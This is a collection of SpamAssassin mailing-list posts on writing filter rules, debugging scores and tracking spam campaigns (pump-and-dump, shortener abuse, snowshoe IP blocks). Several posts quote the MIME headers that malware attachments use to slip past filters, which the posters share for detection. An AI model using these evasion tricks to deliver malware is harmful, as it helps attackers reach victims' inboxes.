[David Alexandre M. de Carvalho]

Hello! I'm using Spamassassin 3.3.1-2 on two of my servers.
Recently I've noticed that there haven't been updates on both channels I use 
(updates.spamassassin.org and
sough.rules.yerp.org).
Does this mean that there won't be any more updates for version 3.3.1-2?
Thanks and regards!
David

Rule header from

[M. Rodrigo Monteiro]

Hi.

How to create a rule to tag e-mails from *@word.*.com.br?

This is what I tested:
header TEST From =~ /.*\@word\..*\.com\.br/i

SA 3.4


M. Rodrigo Monteiro
fale...@rodrigomonteiro.net  http://twitter.com/MarcioRodrigoM/
http://www.facebook.com/mrodrigom/
http://br.linkedin.com/pub/m%C3%A1rcio-rodrigo-de-oliveira-monteiro/28/491/3b8
  http://foursquare.com/marciorodrigom fale...@rodrigomonteiro.net
fale...@rodrigomonteiro.net
Free as in Freedom, not free as in free beer
As we are liberated from our own fear, our presence automatically
liberates others
Linux User # 403730

Pense antes de imprimir. Think before printing.

AVISO LEGAL
Esta mensagem é destinada exclusivamente para a(s) pessoa(s) a quem é
dirigida, podendo conter informação confidencial e/ou legalmente
privilegiada. Se você não for destinatário desta mensagem, desde já fica
notificado de abster-se a divulgar, copiar, distribuir, examinar ou, de
qualquer forma, utilizar a informação contida nesta mensagem, por ser
ilegal. Caso você tenha recebido esta mensagem por engano, pedimos que nos
retorne este E-Mail, promovendo, desde logo, a eliminação do seu conteúdo
em sua base de dados, registros ou sistema de controle. Fica desprovida de
eficácia e validade a mensagem que contiver vínculos obrigacionais,
expedida por quem não detenha poderes de representação.

LEGAL ADVICE
This message is exclusively destined for the people to whom it is directed,
and it can bear private and/or legally exceptional information. If you are
not addressee of this message, since now you are advised to not release,
copy, distribute, check or, otherwise, use the information contained in
this message, because it is illegal. If you received this message by
mistake, we ask you to return this email, making possible, as soon as
possible, the elimination of its contents of your database, registrations
or controls system. The message that bears any mandatory links, issued by
someone who has no representation powers, shall be null or void.

RE: SPAM from a registrar

[Chip M.]

James, are these botnet or snowshoe spam?

When you get a chance, please provide some spamples (pastebin or 
elsewhere), as Kevin recommended.  Please mung JUST the email
addresses (e.g. change all email domains to example.com, and
change the victim account name to victim).  If the victim
accounts are NOT spamtraps/honeypots, don't worry about the other
headers, since you _DO_ want spammers to listwash you. :)

There's a high probability that others are seeing the same
campaign and can provide much better advice if we can see
exactly what you are seeing.
You ARE asking good questions, we just need more a bit more data.


Along the same lines, is there any test to determine the country
of origin of the IP address in the last hop before it connects
to our servers?

http://wiki.apache.org/spamassassin/RelayCountryPlugin

I've been using a homebrew equivalent for more than nine years,
and it's VERY helpful.

The downside is that it can also crank up your FP rate.

I only recommend using it if you have a decent quarantine and
retesting tool.

For example, I score VERY aggressively on IP-to-Nation and on
TLD-to-Nation tests, then retest (with a different balance of
scores) typically about 1 to 48 hours after initial arrival, at
which point more than 99% are on multiple reliable blocklists.
I briefly hand check the rest.  That takes much of the stress and
uncertainty out of filtering. :)
- Chip

Score Problem

[M. Rodrigo Monteiro]

Hi All.

Below is my SA.
The problem is that the score is 0.0, but in the debug log has got hit.
What am I missing?

= Init =
/usr/bin/perl -T -w /usr/local/bin/spamd -D -d -c -m24 --username
spamfilter -H /opt/spamassassin -s /opt/spamassassin/spamassassin.log -r
/var/run/spamd.pid
= Init =

= Version =
SpamAssassin 3.4.0 (tar.gz) on CentOS 6.5
= Version =

= local.cf =
body __REGRALOCAL01 /nome e sobrenome/i
body __REGRALOCAL02 /confirme a senha/i
meta __REGRALOCAL_USUARIO_SENHA (__REGRALOCAL01  __REGRALOCAL02)
score __REGRALOCAL_USUARIO_SENHA 4.0

body __REGRALOCAL03 /nome de usu/i
body __REGRALOCAL04 /senha/i
meta __REGRALOCAL_USUARIO_SENHA02 (__REGRALOCAL03  __REGRALOCAL04)
score __REGRALOCAL_USUARIO_SENHA02 4.0

body __REGRALOCAL05 /e-mail/i
body __REGRALOCAL06 /senha/i
body __REGRALOCAL07 /conta/i
meta __REGRALOCAL_USUARIO_SENHA03 (__REGRALOCAL05  __REGRALOCAL06 
__REGRALOCAL07)
score __REGRALOCAL_USUARIO_SENHA03 4.0

body __REGRALOCAL_REVALIDAR /clique aqui para revalidar/i
score __REGRALOCAL_REVALIDAR 4.0

body __REGRALOCAL_VALIDAR_CONTA /validar conta/i
score __REGRALOCAL_VALIDAR_CONTA 4.0

body __REGRALOCAL_YOLASITE02 /seu e-mail id precisa ser atualizado com o
nosso/i
score __REGRALOCAL_YOLASITE02 4.0

body __REGRALOCAL_SENHA /confirmar senha/i
score __REGRALOCAL_SENHA 4.0

body __REGRALOCAL_SENHA02 /confirmar a senha/i
score __REGRALOCAL_SENHA02 4.0
= local.cf =

= SA Debug log =
Tue May 13 15:27:26 2014 [17813] dbg: rules: running body tests; score so
far=0
Tue May 13 15:27:26 2014 [17813] dbg: rules: ran body rule __REGRALOCAL07
== got hit: conta
Tue May 13 15:27:26 2014 [17813] dbg: rules: ran body rule
__REGRALOCAL_SENHA == got hit: Confirmar senha
Tue May 13 15:27:26 2014 [17813] dbg: rules: ran body rule __REGRALOCAL03
== got hit: Nome de usu
Tue May 13 15:27:26 2014 [17813] dbg: rules: ran body rule __REGRALOCAL04
== got hit: Senha
Tue May 13 15:27:26 2014 [17813] dbg: rules: ran body rule __REGRALOCAL05
== got hit: e-mail
= SA log =

= mail header =
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
xx.x.xxx
X-Spam-Level:
X-Spam-Status: No, score=0.0 required=4.0 tests=HTML_MESSAGE,T_REMOTE_IMAGE
shortcircuit=no autolearn=ham autolearn_force=no version=3.4.0
= mail header =

Regards,
Rodrigo




M. Rodrigo Monteiro
fale...@rodrigomonteiro.net  http://twitter.com/MarcioRodrigoM/
http://www.facebook.com/mrodrigom/
http://br.linkedin.com/pub/m%C3%A1rcio-rodrigo-de-oliveira-monteiro/28/491/3b8
  http://foursquare.com/marciorodrigom fale...@rodrigomonteiro.net
fale...@rodrigomonteiro.net
Free as in Freedom, not free as in free beer
As we are liberated from our own fear, our presence automatically
liberates others
Linux User # 403730

Pense antes de imprimir. Think before printing.

AVISO LEGAL
Esta mensagem é destinada exclusivamente para a(s) pessoa(s) a quem é
dirigida, podendo conter informação confidencial e/ou legalmente
privilegiada. Se você não for destinatário desta mensagem, desde já fica
notificado de abster-se a divulgar, copiar, distribuir, examinar ou, de
qualquer forma, utilizar a informação contida nesta mensagem, por ser
ilegal. Caso você tenha recebido esta mensagem por engano, pedimos que nos
retorne este E-Mail, promovendo, desde logo, a eliminação do seu conteúdo
em sua base de dados, registros ou sistema de controle. Fica desprovida de
eficácia e validade a mensagem que contiver vínculos obrigacionais,
expedida por quem não detenha poderes de representação.

LEGAL ADVICE
This message is exclusively destined for the people to whom it is directed,
and it can bear private and/or legally exceptional information. If you are
not addressee of this message, since now you are advised to not release,
copy, distribute, check or, otherwise, use the information contained in
this message, because it is illegal. If you received this message by
mistake, we ask you to return this email, making possible, as soon as
possible, the elimination of its contents of your database, registrations
or controls system. The message that bears any mandatory links, issued by
someone who has no representation powers, shall be null or void.

Re: unusual new pump-and-dump campaign (RCHA)

[Chip M.]

Thanks Alex! :)

As Alex's rules imply, it switched over to 100% image spam
(in my spamtraps), and continued its excellent syncing.

Just on April 11, the volume more than tripled, and it hit many
different spamtraps than all previous days.  Some of those traps
had never been hit before, and/or are of esoteric origin.

Today, it's completely gone.

Instead, I'm seeing what looks like another calibration run.
What's odd is that _ALL_ the Message-IDs are of the form:
999.999...@f99.my.com
where 9 is a number.
Note that the f99 is either one or two digits (mostly two).

As I mentioned, the image spams' generated Message-IDs were also
consistent.  Whenever the next payload hits, there's a fair chance
there may a useful pattern in that field.

I've also seen at least three new waves of malware attachments,
all small, and hitting some of the rare traps that the 
stock and calibration payloads have hit.

I have NEVER seen anything like this botnet.
- Chip

P.S.  If it's of use to anybody, we maintain a list of 
scammed stock symbols and scammer phone numbers:
http://puffin.net/software/spam/symbols.php
I'm planning to do some datamining to publish date ranges
just for the stock symbols.
That will have to wait until I've finished my MASSIVE Snowshoe
datamining and publishing effort.  Stay tuned for that, probably
in dribs  drabs as my work schedule permits. :)

unusual new pump-and-dump campaign (RCHA)

[Chip M.]

Starting Apr 5, about _HALF_ of our spam volume is a 
new pump and dump campaign for stock symbol RCHA.

As well as the high volume, there are several noteworthy 
characteristics:
 - victim account name is used as the sender/From account name
 - very clean HTML
 - very few hits on non-DNS/RBL SpamAssassin tests
 - separate HTML-only and image-payload variants
   (images are very low volume, so far)
 - all HTML variants include well formed unsubscribe headers
 - for the first half day the symbol was unobfuscated, then it
   changed to common gappy forms (e.g. R_C_H_A, R*C*H*A)
 - botnet seems VERY well synchronized with its CC
 - hit some Tagged accounts that were part of major data breaches
   (including both LinkedIn and WellsFargo)

That last point REALLY jumped out.
Previously, almost all of my LI and WF breach spam has been
boy parts related.
That's how I first noticed this campaign, via a trigger that 
flags all breach spam, even before my new-symbol-hunter runs.

Full sample (with obviously redacted email addresses):
http://puffin.net/software/spam/samples/0013_pump_and_dump.txt
I left the Message-ID and other coded headers NON redacted, 
since that spample hit an unimportant spamtrap, 
and those headers might be of interest.


So far, there have been some very consistent headers, which all 
have changed at the same time (i.e. new template) with (so far) 
no gaps, so this botnet seems VERY well synced (compared to what
I've seen in the past).
Starting today, there's two templates that are active.


*** HTML variant...

The From Realname has been one of:
iStockAdvisor
SuperStock Advisor
iStocksInformer
iGoldenStocks
iMarketWatchers
iStockMarketInsider
MarketClub Top Stocks
(listed in order of appearance)

The Subject header has been one of:
One stock Five times your principal 
A biotech company that will make you big bucks
This pharmaceutical could quadruple fast
This is the opportunity of the year
The last tip I gave you tripled your principal
Top 5 Trending Stocks
Don't you deserve an edge in the market?

All contain a Reply-To, which matches the From/SMTP-Sender.

X-Mailer is:
WhatCounts
which does occur in legit ESP emails.

One of the early HTML templates contained three footer 
links (About/Legal/Unsub), which use the victim account name
with dot com.  I don't recall ever seeing that pattern.
Today's two HTML templates contain one footer unsub link,
with the same fake domain pattern.


*** Image variant (either GIF or JPEG)...

From Realnames:
iBuyStock
iTopStocksPicker
iSelectedStocks
iTriplingStocks

Subjects:
The best stocktip for VICTIM-ACCOUNT-NAME
This little company could tenfold your investment, VICTIM-ACCOUNT-NAME
Dear VICTIM-ACCOUNT-NAME, Three hundred percent gains is super possible
Where VICTIM-ACCOUNT-NAME is the victim's email account name.

Within each template, the Image properties have been the exact 
same, and appear to be the same (just eyeballing them, not 
binary comparisons).

They all have a medium sized block (~2K chars) of Bayes salad.
EACH salad and image filename is completely different.

They do not contain unsubscribe links, or any extra headers.

The Message-ID always ends with the victim's domain name, 
NOT the sender (the HTML versions contain standard botnet M-IDs).

All are getting thru SA, however most are hitting:
HTML_IMAGE_ONLY_28 or HTML_IMAGE_ONLY_32
DC_GIF_UNO_LARGO


*** Botnet prep signs:
Around mid-March, our malware attachments volume shot up to
about six times the average for 2014.

In late March, there was what looked like a standard botnet
calibration run, which was probably for this botnet.
I just re-skimmed thru some of those, and the only notable
headers were avast X-Antivirus and X-Mailer with a fake value.


*** Rules:
Originally, these were dying mostly due to Nation-of-IP and 
my custom anti-stocks body word tests.

The Unsub links, X-Mailer, and fake Unsub headers, combined,
are an excellent fingerprint.  They're trying to imitate 
ESP/Bulk senders, but these are mainly coming from 
normal ISP IPs.  I've added rules that only score those 
headers for non-ESP/Bulk IPs.

Of course, the very first thing I did was add RCHA to my
list of scammer symbols. :)
- Chip

Re: Rule FH_RANDOM_SURE causing FPs

[Chip M.]

I just checked the last six months of my most diverse corpus,
and found:  two Ham, zero spam.

Both ham were sent via different ESPs, each of mediocre 
quality though with multiple legitimate (albeit Pakled-y)
customers.

One was from Marriott Rewards with terse SA report:
score=0.9 required=5.1 tests=DKIM_SIGNED, DKIM_VALID, DKIM_VALID_AU, 
FH_RANDOM_SURE, FROM_EXCESS_BASE64, HTML_IMAGE_RATIO_08, HTML_MESSAGE, 
URIBL_BLOCKED

One was from MapMyRun with terse SA report:
score=6.3 required=5.1 tests=DIET_1, DKIM_SIGNED, DKIM_VALID, 
DKIM_VALID_AU, FH_RANDOM_SURE, HTML_MESSAGE, MIME_HTML_ONLY, 
MIME_HTML_ONLY_MULTI, MPART_ALT_DIFF, RCVD_IN_DNSWL_NONE, SUBJECT_DIET

That's using SA 3.3.2 with auto-updates (at a shared webhost).

Upon request, off list I can send the Message-IDs to any 
SA dev(s).  If the corpse(s) would be helpful, I can ask 
the domain admin for them.

I'm planning some data-mining this weekend, and would be happy
to check more data  (mild brag: I finally added flagging to my
data-mining tools, so it will auto-log, even if I forget to
explicitly check).  :)
- Chip

RE: Large # of Spam getting through all of a sudden.

[Duncan, Brian M.]

On 6/10/2013 2:45 PM, Duncan, Brian M. wrote:
 I rarely have seen any SpamAssasin hits on the bodies of these messages.

 (cached, score=-0.125,required 6.5, autolearn=not spam, 
 RP_MATCHES_RCVD -0.12)

Do you train the Bayes database manually? Or via autolearn only?

I use SA via AMaViS, and the header changes look slightly different from
yours, but I see no evidence that Bayes scoring is being used in the
above header (if, in fact, that is a sample header with all SA markup
appended).

--Ben


Thanks for the reply,

We use Autolearn only.

I was thinking of starting some manual training after this bout of messages 
getting through, I just did not know how much of a benefit I would see given 
the behavior of the Spammer -And I have to setup IMAP2mbox so I can get these 
messages from Exchange over to my sendmail boxes first, hope to do that today..

All the hosts are winding up on Zen and Maps after 24 hours, but they only send 
like 20 messages in each set into my environment..  Then they switch to a new 
sending mail server, I figured they would have burned through their hosts by 
now.  This sender seems to have amassed a large number of servers (not 
workstation botnets) before starting this last week.  I can't recall the last 
time we had this happen.


Brian



===
CIRCULAR 230 DISCLOSURE: Pursuant to Regulations Governing Practice Before the 
Internal Revenue
Service, any tax advice contained herein is not intended or written to be used 
and cannot be used
by a taxpayer for the purpose of avoiding tax penalties that may be imposed on 
the taxpayer.
===
CONFIDENTIALITY NOTICE:
This electronic mail message and any attached files contain information 
intended for the exclusive
use of the individual or entity to whom it is addressed and may contain 
information that is
proprietary, privileged, confidential and/or exempt from disclosure under 
applicable law.  If you
are not the intended recipient, you are hereby notified that any viewing, 
copying, disclosure or
distribution of this information may be subject to legal restriction or 
sanction.  Please notify
the sender, by electronic mail or telephone, of any unintended recipients and 
delete the original
message without making any copies.
===
NOTIFICATION:  Katten Muchin Rosenman LLP is an Illinois limited liability 
partnership that has
elected to be governed by the Illinois Uniform Partnership Act (1997).
===

RE: Large # of Spam getting through all of a sudden.

[Duncan, Brian M.]

-Original Message-
From: Kris Deugau [mailto:kdeu...@vianet.ca]
Sent: Monday, June 10, 2013 2:21 PM
To: spamassassin-users
Subject: Re: Large # of Spam getting through all of a sudden.

*nod*  I recently flagged them as a nuisance netblock owner in the
internal DNSBL[1] here.  I've been seeing them for years.

I have 54 netblocks of various sizes and distances from the regional IP
registry on file for them, plus far more suballocations to their
apparent customers.


I would recommend scoring RP_MATCHES_RCVD to -0.001;  it may be useful
in combination with other factors, but as-is and with the default Bayes
autolearn thresholds it can cause bad Bayes autolearn results.  I'd also
recommend dropping the Bayes autolearn-as-ham threshold below 0.

-kgd
[1] To maintain this local DNSBL, I feed IPs and whatever ARIN, RIPE, APNIC, 
AfriNIC or LACNIC allocation and reallocation data I can find into a somewhat 
rough-edged tool I wrote:
https://secure.deepnet.cx/trac/dnsbl.  It's set up to preemptively tag 
netblocks over time;  if IPs keep getting reported in any given block, sooner 
or later it will cross a threshold and IPs not actually reported will still 
have a bit set in the DNS result.
In closing in on three years, I think I've removed netblocks for 
false-positives due to change in ownership of the block maybe twice.

Thanks for the suggestions and information on your experience with maintaining 
your own DNSBL, I have adjusted my autolearn-as-ham below 0 (-5 for now) I can 
see how in this scenario that I am in how that was not helping me..  I also set 
my RP_MATCHES_RCVD to -0.001, I was going to do that anyhow based on other 
reading I have done.

After this I am considering taking a look at building my own DNSBL,  when I 
have more time later I will check out the tools you made, I took a quick look 
at the Perl scripts and they look like it makes it allot easier to do myself.  
Thanks for making that available to everyone.


Brian


===
CIRCULAR 230 DISCLOSURE: Pursuant to Regulations Governing Practice Before the 
Internal Revenue
Service, any tax advice contained herein is not intended or written to be used 
and cannot be used
by a taxpayer for the purpose of avoiding tax penalties that may be imposed on 
the taxpayer.
===
CONFIDENTIALITY NOTICE:
This electronic mail message and any attached files contain information 
intended for the exclusive
use of the individual or entity to whom it is addressed and may contain 
information that is
proprietary, privileged, confidential and/or exempt from disclosure under 
applicable law.  If you
are not the intended recipient, you are hereby notified that any viewing, 
copying, disclosure or
distribution of this information may be subject to legal restriction or 
sanction.  Please notify
the sender, by electronic mail or telephone, of any unintended recipients and 
delete the original
message without making any copies.
===
NOTIFICATION:  Katten Muchin Rosenman LLP is an Illinois limited liability 
partnership that has
elected to be governed by the Illinois Uniform Partnership Act (1997).
===

new (?) Google Translate trick using URL Shorteners

[Chip M.]

There's a new (to me), overly clever campaign combining Google 
Translate with a URL shortener.  It's fairly low volume, but most
are sailing thru SA.  It's such a goofy pattern it feels like it's
worthy of an Extinction level score. :)

These started yesterday (Dec 9) at around 2am Eastern US time, and
ALL the shorteners are still active. :(

They're all coming from Yahoo, with an unusual nation of origin.
In general, MANY of the interesting new campaigns are coming from
one or more of the big Freemailers.

All the URLs have the shortener domain encoded and look like:

http://google.com.ag/translate?u=%79%2e%61%68%6f%6f%2e%69%74/[REDACTED]?hl=en
which translates to:
http://google.com.ag/translate?u=y.ahoo.it/[REDACTED]?hl=en
The REDACTED element is _NOT_ encoded (and does not contain 
brackets, it's just a regular five character shortener parameter).
All are hitting SA's HTTP_EXCESSIVE_ESCAPES. :)

In all cases, the shortener goes to some variation of:
http://1427762013/[REDACTED]/[REDACTED].html

ALL of my samples go to the pure numerical domain 1427762013.
Could someone sanity check that that translates to 85.25.235.93?
That's in German light snowshoe territory. :)

I've seen that form before, and am surprised that any URL shortener
is still allowing those.

So far, there's always two subdirs, and they look like either 
year month, or month day (always numbers).
The filename is long (15 to 19 chars), and looks random, with all
mixed-case alphanumerical characters.

So far, they're all using unusual Google domains (including my old
favorite google.co.ck).  Google tricks campaigns often have 
started with rare TLDs, and often move to Google's default domain,
so it's probably best to write rules for all Google variations.


Suggestions:
Add metas for each of:
* Google Translate
* semi-legit but often exploited URL shorteners
* any Google URL with HTTP_EXCESSIVE_ESCAPES
* combinations of the above, and/or from Freemailers

Personally, I've jacked up the score of HTTP_EXCESSIVE_ESCAPES,
however I do see enough legit-but-thick senders who hit it, that I
understand why it's somewhat low.

John H:
I'll send you a couple of raw corpses so you can wave your
RE magic wand. :)
- Chip

re: Trouble with bayes poisoning spam

[Chip M.]

Hi Alex!

Actually, that's a Snowshoe IP.
Which, on balance, can be a good thing, slaying-wise. :)

Almost four years ago, I posted my approach to snowshoe slaying:

http://mail-archives.apache.org/mod_mbox/spamassassin-users/200902.mbox/%3c20090204.0...@iowahoneypot.com%3e

It has continued to evolve since then.
Both IP block tracking and identity (Subject  From.Realname)
header token checking are still the two most useful approaches.

I see you have hits on RELAYCOUNTRY.  If you maintain your own
virtual snowshoe nations, and merge them into your real nations,
while building a list of snowshoe tokens, you'll have very good 
success catching these.

For example, that IP is in root eSolutions space, and they have
had a snowshoe problem for at least a year and a half.

Here's their ranges that I have in my small scale database:
94.242.192.0 - 94.242.255.255
188.42.0.0 - 188.42.127.255
212.117.160.0 - 212.117.191.255

About two years ago, I hit a tipping point with my snowshoe IP
data, and can now _VERY_ rapidly identify new blocks.

Both of these phrases are in my snowshoe tokens database:
Classic Lantern
Incredible Light

I checked, and one of my best data feeds was hit by the same
IP block in your sample.  Here are quick dumps of the contents of
the identity headers:

frequency and contents of Field [Subject], filtered by [all  IP 
w/188.42.11.]
A unique christmas gift for the kids 
A variety of medigap options explained and simplified
Burn off that belly while you're sleeping 
Compensation information for those that suffered from mesh patch 
complications 
Endless inventory of electronics at 1/5th of what you'd pay for retail 
Ever wondered what it would be like to fly in a private jet?
It's time you chopped that home payment in half 
Learn a new tongue in days
Simple solutions for Medicare and Medigap
Speak Japanese in two weeks
Stop wasting time, start saving on your home payment 
We have your guide to being prepared in the event of a crisis or 
natural disaster 
You can get a Kindle Fire HD for around thirty bucks 
Your guide to being prepared in the event of a crisis or natural 
disaster 

frequency and contents of Field [RealnameFrom], filtered by [all  IP 
w/188.42.11.]
Adorable Santa Letters
Become Multilingual
Better Rates Today
Gain Kowledge
House Payment Halfer
Lose Pounds No Gym
MacBooks From 150.00
Medicare Made Simple
Medigap/Medicare Explained
Mesh Patch Patient Alert
Private Jet Share Packages
Samsung Galaxy Sold 28.54
Surgical Mesh Patch Patient Alert
Your Crisis Preparation Guide

When I get the time, AND some volunteers to help, I plan to publish
the most statistically significant data from BOTH databases. :)

Rob's Invalument data is supposed to be very helpful for snowshoe
detection.  Eventually, I'll get around to trying it. :)


*** John:
How practical would it be to create some metas that hinged off a
snowshoe nation hit on RelayCountry?  We'd have to define some
virtual nation codes, but that's easy.  I'm using a letter + number
combo, since none of the official two digit country codes contain
a number.

That way, you and others could come up with some very nifty 
snowshoe focused tests, and they would ONLY trigger if the sender
used a known snowshoe negligent host, AND the recipient server
chose to use IP-to-Nation tests.  Win-win. :)

I have the naively optimistic notion that some snowshoe hosts
simply do not have anti-spam expertise, and if there was a reliable
library of snowshoe patterns, they might test the outgoing mail of
new customers. :)

This week, I posted a list of proposed 2013 projects to my
volunteers, and at the top is exporting our MassCheck data for SA.
Also on the list are phish and snowshoe data sharing. :)

As soon as I've finished a couple of timesink projects, I'll start
on those.
- Chip

another malware MIME header trick that works with at least one email client

[Chip M.]

There's yet another variant in the ongoing campaign of HTML file 
attachments with javascript malware payloads. :(

The trick is that it sets the Content-Type to application/zip,
and uses an .htm file extension, for example (actual spam):
Content-Type: application/zip
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=Wire_ID88283.htm

This time, it WORKS as the spammer intends, with at least one 
email client (see P.S.).

The payload looks like it's part of Blackhole (pretty much the same
code as was blasted out last week).

Full sample (with mildly/obviously redacted email addresses):
http://puffin.net/software/spam/samples/0012_malware_zip_fake.txt

The vast majority of my samples claim to be from popular phish 
targets, including:  UPS, LinkedIn, Craigslist.

Note that none of these is hitting test T_HTML_ATTACH.

The SpamAssassin scores have ranged from 0.0 thru 3.0 - yes, 
100% are sailing thru.  (They're all being killed by the anti-zip
tests in my post-SA cleanup filter.)

Normally, I'd do a corpora check, to see whether there are any 
legitimate instances of this ContentType file extension mismatch, 
but in this instance, even if it did occur in Ham, it's so 
phenomally STUPID, that I consider it a waste to allow for it.
Some ham was born to die. :\


That opens up the broader issue of mismatches between CTs and
extensions.  The most common legit type I've seen are images,
almost always in niche newsletters, which usually have enough
other, um, eccentricities that they should only be mildly dinged.

When I get some time, I will write some code to analyze my corpora,
and post a detailed list of what mismatches I'm seeing in ham, in 
the wild.

For now, I think it would be a good idea to heavily ding 
all mismatches involving HTML file attachments.  They have too much
potential for harm, and many SA users are small domains without
subject matter expertise (which is exactly how I came to use this
fantastic tool!), and with minimal to no other defensive layers.
Let's give the little guy/gal some help. :)
- Chip

P.S. I tested this by manually removing the base64 encoded payload,
substituting in the base64 portion of a non-attachment HTML part
from a ham, then reinjecting the raw file into my queue.

Eudora 7.1.0.9 translated it to an HTML file, and was able to open
it without any difficulty (it did show a generic warning dialog).

I'll be repeating that with a friend who uses MS clients.
I might put that defanged test case online if anybody would like to
use it to test less mainstream clients.

I used the same basic methodology to test a more elaborate trick
spotted two weeks ago.  The file attachment of that variant was
correctly dropped by both Eudora and a couple of MS clients.

Thanks to list members who have kindly taken the time to test some
of my previous samples! :)

new twist on BitLy

[Chip M.]

There's a new campaign using bitly.com, instead of bit.ly.

Other characteristics are:
1. empty plain text Part, followed by a quoted-printable HTML Part
2. very long HTML Title
3. large Style section, with random text (Bayes salad like)
4. current Subject is FW: your arrest record

I expect the Subject to change, soon.

I had a few hunh moments trying to figure out why my system 
wasn't extracting the shortener parameter, and why NONE of 
my shortener code was kicking in, then had the doh! moment.
Figured I'd try to save someone else that headache. :)

As soon as I realized that bitly.com is (apparently) a 
legit alias for the terser bit.ly, I naively jumped to the 
theory that I could probably kill all of those, because who 
(other than spammers) would be thick enough to use a 
longer URL as a shortener.

I've had plenty of naive obvious solutions foiled by Pakled
senders, so loaded up six months of my most diverse corpus.

Found two spam, and two ham.

Fortunately, the two ham were both political mailing lists,
which explains the twittery, and reinforces my prejudice that 
it's ok to score this domain heavily, as long as one has a 
good quarantine and FP pipeline.

I'll check some more corpora this weekend, and report back if
there's any non-trivial ham using this domain.
- Chip

Re: all spam emails from mailengine1.com servers

[Chip M.]

R - elists wrote: 
does anyone get legit emails that come from the mailengine1.com 
email marketing servers? 

Yes, I've seen a trickle of ham, so did some data mining for you...

The IP ranges I have for them are:
66.59.0.0 - 66.59.31.255
72.19.192.0 - 72.19.255.255
Does anyone have any others?

I found one other hostname:
mailengine3.com
and would infer there would be more, for you RE gurus. :)

The vast majority of what I've seen is spam, however there are 
enough human shields that you may want to score cautiously, 
depending on your environment.

Here's a few of the reasonably legit outfits who use them:
blueman.com
brokerhunter.com
concert-hq.com
dvo.com
email-eventsreg.com
flavorus.com
hotonbroadway.com
quizrocket.com
roddenberry.com
saprankings.com
searchsvc.com
tapulous.com
thecityevents.com

There were also several political spammers, who (as I recall) 
were/are bona fide candidates however they list appended party 
lists, and did NOT confirm them.

Most of those are leisure type sites, so a higher score could
be justifiable in a pure business environment, particularly if
you have a decent quarantine.  Personally, I kill them all, with
a hefty margin, but not above the level at which they'd show up
in our FP pipeline (only if they didn't hit any reliable
blocklists while Q'd).

Robert, thanks for asking!
While generating that data, I had an excuse to improve that report.
I also found a dangling legacy IP block with a lower spam score,
which should have been deprecated years ago, and now has been. :)
- Chip

P.S.  The Geek volunteer who hit the roddenberry domain
(cheerfully) accused me of killing Star Trek - I vaguely recall 
replying with the appropriate McCoy quote. ;)

new technique: borked zip attachment w/malware

[Chip M.]

There's an interesting new zip attachment obfuscation that uses
an encoded EMPTY filename.

I've seen barely a trickle, but so far, all have had VERY low
SA scores (1.1 with generally unremarkable test hits).

I'm still waiting for permission from the recipient to publish
a complete sample.
Here's an actual set of the zip's Content headers:

Content-Type: APPLICATION/X-ZIP-COMPRESSED; name==?iso-8859-5?B?NjI=?=
Content-transfer-encoding: base64
Content-Disposition: attachment; filename==?iso-8859-5?B?NjI=?=

There's one HTML part, followed by the zip part.


Probably the best general defense is to decide that if the 
filename is encoded, it implies the sender committed to putting
something there, and since it was empty, it's a reasonable trait
to score medium to high on.

At first, the unusual Content-Type seemed worth a modest score,
however I did find (business) Ham samples using that form.

Currently, I've got a kill level score for anything with either
zip or compressed in the CT, and which does NOT have .zip
as the file extension.  I do have a robust FP pipeline, so what
makes me feel good, may not work as well for everyone. :)


Does anyone know if any mainstream email client can open such a
file?
I don't use Outlook, so maybe someone who does could zip up 
something benign, email it to themself, grab the network image,
hack the CT filename as above, re-inject it, then try opening it.
- Chip

Re: How to get rid of spam with From spoofed to my own domain

[m...@smtp.fakessh.eu]

Le lundi 12 septembre 2011 00:35, Dave Funk a écrit :
 On Sun, 11 Sep 2011, Martin Gregorie wrote:
  On Sun, 2011-09-11 at 13:47 -0700, rutra80 wrote:
  Hello, lately I receive spam which looks like coming from my domain,
  sometimes it is spoofed like coming from accounts that don't exist, and
  sometimes from the ones that really do. The only SA rule that it
  triggers is Bayesian one, with nearly 100% probability - it assigns 3.5
  points, but my rejection limit is set to 4.5 and I'm not eager to lower
  it. What would be the most elegant and technically correct way to get
  rid of the problem?
 
  Some spammer is forging your host name as sender and randomly generating
  user names.
 
  Set up an SPF record for your domain and make sure its valid by testing
  it with a validation tool.
 
  SPF references
  ==
  http://www.openspf.org provides an overview, documentation and SPF
  record builder wizards.
 
  http://www.kitterman.com/spf/validate.html has test tools to validate
  your SPF record after its built and again when it has been installed.

 However a simple SPF fail doesn't score many points. To deal with the
 exact same issue I added a custom local rule (a __rule so it doesn't
 score points) that looks for our domain name in the From and combined
 that with SPF_FAIL in a meta that really whacks the score.

 IE, in general it's not safe to use SPF_FAIL as a one-shot-kill but
 when restricted to our domain I can trust it.


to say a little something

run openspf software on my host

and I'm having weird problems in the mail

Return-Path: emilien.arino@noa.fr
X-Original-To: m...@smtp.fakessh.eu
Delivered-To: fake...@localhost.r13151.ovh.net
Received: from r13151.ovh.net (localhost.localdomain [127.0.0.1])
by r13151.ovh.net (Postfix) with ESMTP id E8CECCC187
for m...@smtp.fakessh.eu; Tue,  6 Sep 2011 14:11:50 +0200 (CEST)
X-SenderID: Sendmail Sender-ID Filter v1.0.0 r13151.ovh.net E8CECCC187
Authentication-Results: r13151.ovh.net; sender-id=fail (NotPermitted) 
header.from=emilien.arino@n***rea.fr; spf=fail (NotPermitted) 
smtp.mfrom=emilien.arino@noa.fr
Received: from localhost (localhost.localdomain [127.0.0.1])
by r13151.ovh.net (Postfix) with ESMTP id 7E064CC186
for m...@smtp.fakessh.eu; Tue,  6 Sep 2011 14:11:50 +0200 (CEST)
X-Amavis-GeoIP: France Aquitaine Pau
X-Amavis-GeoIP: France  
X-Header-AntiAbuse: report abuse to postmas...@fakessh.eu
X-Header-AntiAbuse: sender emilien.arino@noa.fr emilien.arino
@noea.fr emilien.arino@no*a.fr
X-Header-AntiAbuse: client addr 46.105.7.81
X-Header-AntiAbuse: client addr 217.119.181.45
X-Header-AntiAbuse: primary hostname r13151.ovh.net
X-Virus-Scanned: amavisd-new at r13151.ovh.net
Received: from r13151.ovh.net ([127.0.0.1])
by localhost (r13151.ovh.net [127.0.0.1]) (amavisd-new, port 10024)
with LMTP id poVU1eVAIlPQ for m...@smtp.fakessh.eu;
Tue,  6 Sep 2011 14:11:35 +0200 (CEST)
Received-SPF: pass (noa.fr: 46.105.7.81 is authorized to 
